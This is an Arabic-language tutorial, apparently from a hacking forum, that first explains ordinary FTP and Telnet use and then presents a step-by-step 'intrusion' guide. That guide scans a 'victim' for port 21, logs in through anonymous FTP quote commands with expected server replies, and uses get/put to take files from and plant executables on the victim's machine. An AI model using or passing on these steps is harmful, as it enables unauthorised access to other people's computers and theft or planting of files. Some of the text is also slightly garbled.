أول ماتفعله في هذا النوع من نقل الملفات هو ادخال الملقن الخاص بشركة توفير الخدمة فمثلاً سوف تدخل حسابك في Tripod عن طريق Unix Shell، نكتب أولاً الأمر ftp متبوعاً بالوجهة المرادة فيصبح: ftp ftp.tripod.com ثم ندخل الاسم وهو عل سبيل المثال "IronPrivate"، ثم نقوم بادخال الرقم السري وهو مثلاً "******". وبعد الدخول الى الحساب يمكنك استخدام نفس أوامر Unix المعتادة.
نقل الملفات باستخدام المتصفح Browser:
نقل الملفات عن طريق المتصفحات سهل جداً فما عليك سوى ادخال عنوان الموقع URL ويبدأ العنوان بكلمة //tp ثم العنوان بدلاً من كلمة //:http للعناوين العادية، بعد الدخول الى موقع الـFTP ستأتي الصفحة عبارة عن ملفات ومجلدات وماعليك سوى النقر على الملف المطلوب لانزاله.
نقل الملفات باستخدام حساب SLIP/PPP:
أفضل استخدامات هذا النوع من الربط أنها تسمح لنا باستخدام برامج تابعة Client Programs. وأفضل برنامج تابع يمكن استخدامه للنوافذ Windows هو برنامج Ws_ftp.
- استخدام برنامج Ws_ftp LE 5.06:
ادخل على البرنامج وذلك بالنقر المزدوج على أيقونة البرنامج، سيظهر لك مربع حوار Session Profile والذي من خلاله تقوم بتسجيل الدخول، اكتب في خانة Profile Name اسم حساب الدخول؛ على سبيل المثال My Home Page In Tripod واكتب في خانة Host Name اسم الملقن وفي هذا المثال هو ftp.tripod.com ثم في خانة Host Type اختر Auto Detect لكي يقوم بالتدقيق التلقائي في نوع نظام الجهاز المضيف، بعد ذلك قم بكتابة الاسم في خانة User ID وهو مثلاً IronPrivate ثم الرقم السري في خانة Password وسيظهر مخفياً على هيئة نجوم ******, ثم اضغط OK.
************************************
الاختراق من الدوس (3) و(4)
نقل الملفات باستخدام الاتصال الشبكي البعيد Telnet:
Telnet هي بروتوكول انترنت معياري لخدمات الربط عن بعد ويسمح للمستخدم بربط جهازه على كمبيوتر مضيف جاعلاً جهازه وكأنه جزء من ذلك الكمبيوتر البعيد. ويختلف العرض حسب نظام الكمبيوتر المضيف. اذا كان الجهاز البعيد يستخدم نظام Windows فلا مشكلة أما اذا كان يستخدم نظام آخر فيجب معرفة بعض الأوامر للتحكم وأهم أمر يجب أن تعرفه هو "؟" والذي يحضر لك قائمة بالأوامر اللازمة.
استخدام برنامج Telnet من Windows:
ترفق Windows برنامجاً سهلاً يسمى Telnet يمكنك الدخول عليه بالضغط على قائمة ابدأ Start ثم تشغيل Run ثم اكتب Telnet وستنفتح لك صفحة البدء للبرنامج.. من Connect اختر Remote System. في صندوق الحوار Connect الذي سيظهر لك اكتب في خانة Host Name اسم ملقن الجهاز المضيف ثم اكتب في خانة Port الميناء أو المنفذ ( اذا كان لديك) او اتركه كما هو، ثم اختر من الـTerm Type ، ان كان لديك والا قم بالتجربة. بعد ذلك اضغط Connect وعندما يتم الربط فستحتاج لادخال الاسم والرقم السري. وبعد الانتهاء من النقل اخترDisconnect من قائمة Connect وبعد ذلك اختر Exit.
=========
الاختراق :
=======
FTP
أولا و لنجاح الإقتحام يجب ان يكون لدى الضحية البور
21
مفتوح و هو البور الخاص ب
FTP
و لتأكد من أن البور مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من اهمها
Superscanne
بعدما تتأكد ان البور مفتوح ننتقل الى الخطوة الثانية و هي
إضغط على
Start
ثم
Run
ثم اكتب
ftp –n
سوف تطلع لك نافدة في الدوس مكتوب عليها
FTP>
ؤوكي لحد هنا كل شيء تمام
و بعدين اكتب
Open
ثم إضغط على
إدخال
Enter
سوف تتحصل عب النتيجة التالية
FTP>
To
أكتب بجانب
To
رقم الإبي للضحية ثم إضغط على إدخال
و الآن خد بالك معي
إدا تحصلت على هدا الرد فقد تخطيت خطوة
Connected to http://www.assassin.com/
220 websrv1 Microsoft FTP Service (Version 4.0).
و الآن أكتب الكتابة التالية
ftp>quote user ftp
إدا تحصلت على هدا الرد فقد تخطيت خطوة
331 Anonymous acces allowed, send identify (e-mail name) as password.
و الآن أكتب الكتابة التالية
ftp>quote cwd ~root
إذا تحصلت على هدا الرد فقد تخطيت خطوة
530 Please login with USER and PASS
ثم أكتب الكتابة التالية
ftp>quote pass ftp
إدا تحصلت على هدا الرد فقد تخطيت خطوة
و نجحت في الإقتحام
230 Anonymous user logged in.
مبروك أنت الآن في جهاز الضحية
ما عليك الآن الا ان تقوم بإستعمال
اوامر الف تي بي
هذه هى اوامر الاف تى بى مبسطة لاستخدامها فى نقل ملفات من و الى الضحية و غير ذلك
Pwd
لكي تعر ما يحتويه الهارد ديسك
Cd
لإقتحام مجلد مثال
Cd black
في هدا المثال قمت بإقتحام مجلد المسمى بلاك
Ls
لكي يتضح لك محتوى المجلد أو الهارد ديسك
Get
لكي تحمل الى سطح المكتب بتاع جهازك
مثال
Get black.exe
Put
العملية العكسية ل Get
يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في
في جهاز الضحية
مثال
Put black.exe
Clos
لقطع الإتصال مع الضحية
